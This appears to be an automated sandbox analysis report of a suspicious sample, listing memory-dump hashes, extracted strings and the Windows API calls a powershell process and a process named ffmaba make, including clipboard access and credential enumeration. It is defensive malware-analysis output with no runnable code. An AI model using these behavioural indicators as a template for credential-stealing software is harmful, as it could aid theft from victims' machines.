                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b87dfc58c9300cb317415e2342de26e8ccfcbdf65cd2f2ed4c99abbb86c9d50
                                                                            • Instruction ID: f9cf44835d797a7f44dbad83b457774978128d129f24e77fa768187698b9f3b7
                                                                            • Opcode Fuzzy Hash: 6b87dfc58c9300cb317415e2342de26e8ccfcbdf65cd2f2ed4c99abbb86c9d50
                                                                            • Instruction Fuzzy Hash: F2F0E9367456245BC612565DBC104EF7F6ADDC72B130085A7E309C7500DE115D0483E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 88898ea5591d227609c4c60308414936ee4d80b4b460a7671d039b2a37707bdf
                                                                            • Instruction ID: d6ffe11e0a5dd313af056d21a02e29212f9f70ade38add0c597b716239e6d423
                                                                            • Opcode Fuzzy Hash: 88898ea5591d227609c4c60308414936ee4d80b4b460a7671d039b2a37707bdf
                                                                            • Instruction Fuzzy Hash: 43F04C366046048BD702AB74D4043EBBBA2EFC1354F5081BBDA058B396CD3A6806CBE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 249221f531201d73138a3b9f62b029f24a00ca2ae76646161975823a5acf3f82
                                                                            • Instruction ID: fcde2802e8a4d91d3c5e953fc5e840c6bd2ff0afec51830f07e3e42fca69d100
                                                                            • Opcode Fuzzy Hash: 249221f531201d73138a3b9f62b029f24a00ca2ae76646161975823a5acf3f82
                                                                            • Instruction Fuzzy Hash: C7F022316053019FC3019B79E948DAE7FF5EF892217050A6EE00AC7651DB305C81C720
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30349a7c1999ab6650d9cd946e30f2867fb1ea22e23c34260aed68fcabf0c865
                                                                            • Instruction ID: 6533845e656f7f22e98f3d638c400f3ae3ed5e97a7147a1474f24086002456a4
                                                                            • Opcode Fuzzy Hash: 30349a7c1999ab6650d9cd946e30f2867fb1ea22e23c34260aed68fcabf0c865
                                                                            • Instruction Fuzzy Hash: D2F0F976200600AF97618F0ADD85C23FBADEFD4674719C55AE84A4B716C771EC41CAA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b92fc88be94f7b8b57a7cd21dcea74c3b953848a1cefb1f5208e1219855eda6b
                                                                            • Instruction ID: 5f266309a450ce99407564f04bae528948a89a25c1123e73fead481eb18ea88b
                                                                            • Opcode Fuzzy Hash: b92fc88be94f7b8b57a7cd21dcea74c3b953848a1cefb1f5208e1219855eda6b
                                                                            • Instruction Fuzzy Hash: AEF0B4715063504FC3519F78E8983DABFA5FB01310F44846AE28DC7241DB3869418B91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,gq$0oFp$$cq$$cq$$cq$$cq$$cq$$cq
                                                                            • API String ID: 0-3690240453
                                                                            • Opcode ID: ac47f2ede8ee7ff92582adc28ad52d8be4803c7e540119ce3fa3d78f9b1f8260
                                                                            • Instruction ID: 308f4b31e3bed758bcdf3031351699e9df5369ab32e54e24414fec55f7bafa12
                                                                            • Opcode Fuzzy Hash: ac47f2ede8ee7ff92582adc28ad52d8be4803c7e540119ce3fa3d78f9b1f8260
                                                                            • Instruction Fuzzy Hash: F541E9633844008FC76A9BB9885557D3A93BFCE74435A94AAD212CB7B3DF11EC40C352
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fhq$4'cq$4'cq$4'cq$4'cq$r l$r l
                                                                            • API String ID: 0-2080564758
                                                                            • Opcode ID: 65fd6642249ac31f858876b086edc8e06a56fb369e7600b68a0d7b3122589d91
                                                                            • Instruction ID: c19d0a9188d438598f453353734893a1b4faf69bc0da271a6841bb307ed8313c
                                                                            • Opcode Fuzzy Hash: 65fd6642249ac31f858876b086edc8e06a56fb369e7600b68a0d7b3122589d91
                                                                            • Instruction Fuzzy Hash: 86F148B57042659FCB159B78D41066ABBA2EFC2210F14C0FBDA46CB752DB31DC86CBA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0oFp$0oFp$0oFp$`Qcq$$cq$$cq$$cq
                                                                            • API String ID: 0-357146346
                                                                            • Opcode ID: 05d22ade9058ecbe81e6df4afc25ce8325e1c841e6961113fdf734ad1a2be49c
                                                                            • Instruction ID: af12d4d5526b1c8222c14fef112cebcbe0a4c226e45bd356dfa9824168ae3e76
                                                                            • Opcode Fuzzy Hash: 05d22ade9058ecbe81e6df4afc25ce8325e1c841e6961113fdf734ad1a2be49c
                                                                            • Instruction Fuzzy Hash: DDE134317501108FDBA59BB9841463E77D69FC8B18B29D4AADA06DB7E2EF30DC0183D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$tPcq$tPcq$J!l$J!l$J!l
                                                                            • API String ID: 0-3786948392
                                                                            • Opcode ID: e16ffc40ecaa7574cc82fb856e74c070d56be44fa4c10d74ec5455bf043fa3d7
                                                                            • Instruction ID: deb2746ae3fc86dd7b0c28338e4ead1d8acaf9be7d0361dbf0b78472e1791491
                                                                            • Opcode Fuzzy Hash: e16ffc40ecaa7574cc82fb856e74c070d56be44fa4c10d74ec5455bf043fa3d7
                                                                            • Instruction Fuzzy Hash: 3B41EEB1B1420ACFCB159A698415667FBE2AFC6710F28C0B7D5168F356C731C882C761
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: eeb4885a602523361f4b08290d1b0f2897d71d1ce25a35b93898ffa2aaeb79c9
                                                                            • Instruction ID: 3b4fa119cba704879e01249d96952f88cd11b01bc6f0fc183fcd7d03c188791b
                                                                            • Opcode Fuzzy Hash: eeb4885a602523361f4b08290d1b0f2897d71d1ce25a35b93898ffa2aaeb79c9
                                                                            • Instruction Fuzzy Hash: 11B1B6B4E016099FCB55DFA9D990A9DFBF2FF48300F109629E819AB315DB30A945CF90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: 7cfbf2de8a4735795f765ddc48a9c2fb077f4ac948fafed53be397ff515ac759
                                                                            • Instruction ID: 6e3507eb2117181c1c2c4019029daf2ea0de7c1ccc7c9afa27f171264bd268a0
                                                                            • Opcode Fuzzy Hash: 7cfbf2de8a4735795f765ddc48a9c2fb077f4ac948fafed53be397ff515ac759
                                                                            • Instruction Fuzzy Hash: 59B1A774E016099FCB55DFA9D990A9DFBF2FF48300F509629E819AB305DB30A945CF90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: ae3d505e61a5089a0acf12ed84c4308931e5732356686afb0388d973ccd93f9e
                                                                            • Instruction ID: 355f43cd336767d3a8a49c5f986ae203a1b0ffebc6d964b6bf320efa441e54fe
                                                                            • Opcode Fuzzy Hash: ae3d505e61a5089a0acf12ed84c4308931e5732356686afb0388d973ccd93f9e
                                                                            • Instruction Fuzzy Hash: D1B1B5B4E006099FCB55DFA9D990A9DFBF2FF48300F109629E819AB305DB30A945CF90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$pij$r l$r l
                                                                            • API String ID: 0-1543505625
                                                                            • Opcode ID: f2cfea6734e58faf9c9c830484db95316806f77dacef6ecb341f486f8dfd315d
                                                                            • Instruction ID: c4a0e552c052ee80afff121a3f02e343af8091490f598dde3be957f94222bb1d
                                                                            • Opcode Fuzzy Hash: f2cfea6734e58faf9c9c830484db95316806f77dacef6ecb341f486f8dfd315d
                                                                            • Instruction Fuzzy Hash: B37105B5B0421ECFCB299B7994006AABBF2EFC6211F14847BD506CB355DB3589C1CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$$cq$$cq$$cq
                                                                            • API String ID: 0-838516036
                                                                            • Opcode ID: d4950a28e3de7a8c0fb3eecf70b2466db9b48e85bedec7c69c038e0566c1ccbd
                                                                            • Instruction ID: e25ed82cdde32af47733b93bff907d0dd210da82eac05c8cb439d374157e6e76
                                                                            • Opcode Fuzzy Hash: d4950a28e3de7a8c0fb3eecf70b2466db9b48e85bedec7c69c038e0566c1ccbd
                                                                            • Instruction Fuzzy Hash: 345108F571420A9FDB255A7A8801766FBB6AFC2620F24807BD447EB392DB35C842C791
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$4'cq$4'cq
                                                                            • API String ID: 0-1446110543
                                                                            • Opcode ID: b75e01c6dd56e90edaf1688c9ddab2577d52a318d1a97cda46a3d14434fadb58
                                                                            • Instruction ID: 80d2891b0b872b6cdafe8dbe8d04569e42c843f61c7940964626216ddce00319
                                                                            • Opcode Fuzzy Hash: b75e01c6dd56e90edaf1688c9ddab2577d52a318d1a97cda46a3d14434fadb58
                                                                            • Instruction Fuzzy Hash: 3AD138B17042959FCB169B79880277ABFB2AFD2611F14807BD906CB391DF32D852C7A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$$cq$$cq
                                                                            • API String ID: 0-2876200767
                                                                            • Opcode ID: 09f08cb8dafc508078a1405ac28fa5940d1638ea64d1b578250b053343a554d0
                                                                            • Instruction ID: 9111e3dce35e9381f03bb8d0ab959999cd80b9c475ae3c026410881478c702b6
                                                                            • Opcode Fuzzy Hash: 09f08cb8dafc508078a1405ac28fa5940d1638ea64d1b578250b053343a554d0
                                                                            • Instruction Fuzzy Hash: A22168B271022A9FDB34597A9800727BB97ABD5711F24803EE90BCB383DD75C851C361
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pij$pij$J!l$J!l
                                                                            • API String ID: 0-1243686353
                                                                            • Opcode ID: cd52c65da46119941328a4d2b5835ad920a92bcfe290db17bc785e95b3c5ae91
                                                                            • Instruction ID: 4b4be9dbf74a24f6d6eb76b5a8d4c2352c24c92c540088f46ed7602e5d8bf9b6
                                                                            • Opcode Fuzzy Hash: cd52c65da46119941328a4d2b5835ad920a92bcfe290db17bc785e95b3c5ae91
                                                                            • Instruction Fuzzy Hash: 6E3106F1904306DFDB22CF25C1606A5BBF0FF41210F6880A6F80ACB251C735D985CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$$cq$$cq
                                                                            • API String ID: 0-1126079151
                                                                            • Opcode ID: b6de20df5ca66eab452b3ee885b8d74c46d02e8aae4acd47fb459fbb4031632b
                                                                            • Instruction ID: 2174790603254eb7a7fed30cc5e864515964c3f133bec215b00117c4aed0cfd8
                                                                            • Opcode Fuzzy Hash: b6de20df5ca66eab452b3ee885b8d74c46d02e8aae4acd47fb459fbb4031632b
                                                                            • Instruction Fuzzy Hash: 8801A7A17197979FDB3712285C21166BFB3AFC360075940E7C542CB297CE248C4687A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$J!l$J!l
                                                                            • API String ID: 0-2426129395
                                                                            • Opcode ID: 1cf36dd46893868118a933cd63f37a219fb6a00748e139cdf711c062632d5777
                                                                            • Instruction ID: 9ceaa0c13f61d9ab72dfb9dae17018f801404a674c142470662c2204cc837043
                                                                            • Opcode Fuzzy Hash: 1cf36dd46893868118a933cd63f37a219fb6a00748e139cdf711c062632d5777
                                                                            • Instruction Fuzzy Hash: 6401FCB161D3865FD72742284C31053BFF2AFD361076A41A7E685EF297D6344C45C366

                                                                            Execution Graph

                                                                            Execution Coverage:7.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:58
                                                                            Total number of Limit Nodes:3

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04CA20A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2267191163.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_4ca0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID: l$l
                                                                            • API String ID: 716092398-3124565592

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04CA20A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2267191163.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_4ca0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID: l$l
                                                                            • API String ID: 716092398-3124565592

                                                                            Control-flow Graph

                                                                            control_flow_graph 1486 4ca1544-4ca459c 1489 4ca464c-4ca466c call 4ca141c 1486->1489 1490 4ca45a2-4ca45a7 1486->1490 1498 4ca466f-4ca467c 1489->1498 1491 4ca45fa-4ca4632 CallWindowProcW 1490->1491 1492 4ca45a9-4ca45e0 1490->1492 1494 4ca463b-4ca464a 1491->1494 1495 4ca4634-4ca463a 1491->1495 1500 4ca45e9-4ca45f8 1492->1500 1501 4ca45e2-4ca45e8 1492->1501 1494->1498 1495->1494 1500->1498 1501->1500
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04CA4621
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2267191163.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_4ca0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID: l
                                                                            • API String ID: 2714655100-1830764883
                                                                            • Opcode ID: 099a284fdcd45808759488a08b2ff26aecee524f77553d5de0183f34331591f5
                                                                            • Instruction ID: 67d456b3c2baf710bcbbb3b6cfde8af07c53c897316d25c68594ba4e1d09b24a
                                                                            • Opcode Fuzzy Hash: 099a284fdcd45808759488a08b2ff26aecee524f77553d5de0183f34331591f5
                                                                            • Instruction Fuzzy Hash: 78413BB9900205DFDB14CF99C448AAAFBF6FB88314F18C459D50967321D374A940CFA4

                                                                            Control-flow Graph

                                                                            control_flow_graph 1503 27444b4-27459b9 CreateActCtxA 1506 27459c2-2745a1c 1503->1506 1507 27459bb-27459c1 1503->1507 1514 2745a1e-2745a21 1506->1514 1515 2745a2b-2745a2f 1506->1515 1507->1506 1514->1515 1516 2745a40 1515->1516 1517 2745a31-2745a3d 1515->1517 1519 2745a41 1516->1519 1517->1516 1519->1519
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 027459A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: l
                                                                            • API String ID: 2289755597-1830764883
                                                                            • Opcode ID: 8cdff9e5b547589cdcfb6119b02aebbd603a61d1f466232c1d28207bd3d251fe
                                                                            • Instruction ID: 7aa538e097503693a3e04b73e7a4e0ece3fbf374cdfdd2929a6cd7ebf88f52d4
                                                                            • Opcode Fuzzy Hash: 8cdff9e5b547589cdcfb6119b02aebbd603a61d1f466232c1d28207bd3d251fe
                                                                            • Instruction Fuzzy Hash: B941D1B0D00719CBDB24DFA9C944B9EBBF6BF48304F60806AD408AB251DB756949CF90

                                                                            Control-flow Graph

                                                                            control_flow_graph 1520 27458f7-27459b9 CreateActCtxA 1522 27459c2-2745a1c 1520->1522 1523 27459bb-27459c1 1520->1523 1530 2745a1e-2745a21 1522->1530 1531 2745a2b-2745a2f 1522->1531 1523->1522 1530->1531 1532 2745a40 1531->1532 1533 2745a31-2745a3d 1531->1533 1535 2745a41 1532->1535 1533->1532 1535->1535
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 027459A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: l
                                                                            • API String ID: 2289755597-1830764883
                                                                            • Opcode ID: 35168aaf42adfa5d23469db59d2bead73154a84e38c6b5c892201c6a9eccb87f
                                                                            • Instruction ID: 1558281f8ba4020f7279d5b0d4d344528bc67fb78893ea05d9d23896043c8e7f
                                                                            • Opcode Fuzzy Hash: 35168aaf42adfa5d23469db59d2bead73154a84e38c6b5c892201c6a9eccb87f
                                                                            • Instruction Fuzzy Hash: 0541D0B0D00719CFDB24CFA9C984B9EBBF6BF49304F20816AD408AB255DB756949CF90

                                                                            Control-flow Graph

                                                                            control_flow_graph 1536 274d2d0-274da1c DuplicateHandle 1538 274da25-274da42 1536->1538 1539 274da1e-274da24 1536->1539 1539->1538
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D94E,?,?,?,?,?), ref: 0274DA0F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID: l
                                                                            • API String ID: 3793708945-1830764883
                                                                            • Opcode ID: b2029d1369c694d955e48b1370e1ae41d17a451a04cde175239e90c15b3800f4
                                                                            • Instruction ID: 1051ce4c1362543ea24824ef507c090c12230f99857e73861cfade52ad791b5e
                                                                            • Opcode Fuzzy Hash: b2029d1369c694d955e48b1370e1ae41d17a451a04cde175239e90c15b3800f4
                                                                            • Instruction Fuzzy Hash: F921E5B59102489FDB10CFAAD984AEEBBF4FB48310F14845AE954B7310D374A940CFA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 1542 274aeb0-274b960 1544 274b962-274b965 1542->1544 1545 274b968-274b997 LoadLibraryExW 1542->1545 1544->1545 1546 274b9a0-274b9bd 1545->1546 1547 274b999-274b99f 1545->1547 1547->1546
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0274B779,00000800,00000000,00000000), ref: 0274B98A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: l
                                                                            • API String ID: 1029625771-1830764883
                                                                            • Opcode ID: 9b21b2f23c64f8dc48eace75a5f6d738cb8d7ac9a61489e93725e38415bfc4a1
                                                                            • Instruction ID: c342a8121dcf3aff88e99992368d8d61c7f40227ebc9096de14bed7e5a7fc209
                                                                            • Opcode Fuzzy Hash: 9b21b2f23c64f8dc48eace75a5f6d738cb8d7ac9a61489e93725e38415bfc4a1
                                                                            • Instruction Fuzzy Hash: AA1114B6D00209DFDB10CFAAC444AAEFBF4EB48314F10842AD519B7200C775A944CFA5
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0274B6FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2255798514.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_2740000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID: l
                                                                            • API String ID: 4139908857-1830764883
                                                                            • Opcode ID: 944d18e3079742bf3c1bdcd5c48730f60ec85c824bc91b7d902549e18141c6d2
                                                                            • Instruction ID: 46643ccf9a3c43d22dbaf27e64b30b32d1753d04b6be3228095baafbee42f34b
                                                                            • Opcode Fuzzy Hash: 944d18e3079742bf3c1bdcd5c48730f60ec85c824bc91b7d902549e18141c6d2
                                                                            • Instruction Fuzzy Hash: 3B11E3B6C00249CFCB10CF9AD944ADEFBF4EB88324F14845AD419A7610D375A545CFA5

                                                                            Execution Graph

                                                                            Execution Coverage:17.8%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:84
                                                                            Total number of Limit Nodes:6
                                                                            execution_graph: node list omitted; API calls named in the graph: OleGetClipboard, CreateActCtxA, GetModuleHandleW, LoadLibraryExW, DuplicateHandle, CredEnumerateW
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LRcq
                                                                            • API String ID: 0-4134321033
                                                                            • Opcode ID: a4f2e4e646bd2822016dee86292becefd928981dbe406cbef636ffd1f263c795
                                                                            • Instruction ID: 52641682c65a17b5c23dc41ddf3e40e4c3af5f97d83d6c9be0ed20f5a67782e4
                                                                            • Opcode Fuzzy Hash: a4f2e4e646bd2822016dee86292becefd928981dbe406cbef636ffd1f263c795
                                                                            • Instruction Fuzzy Hash: F4F2AE74911229CFCB65DF68C988B99BBB6BF49301F1491E9E50DA7261DB30AEC1CF40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LRcq
                                                                            • API String ID: 0-4134321033
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4564711094.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_6290000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq
                                                                            • API String ID: 0-2110363268
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 052CB6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 052C59A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 052C59A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
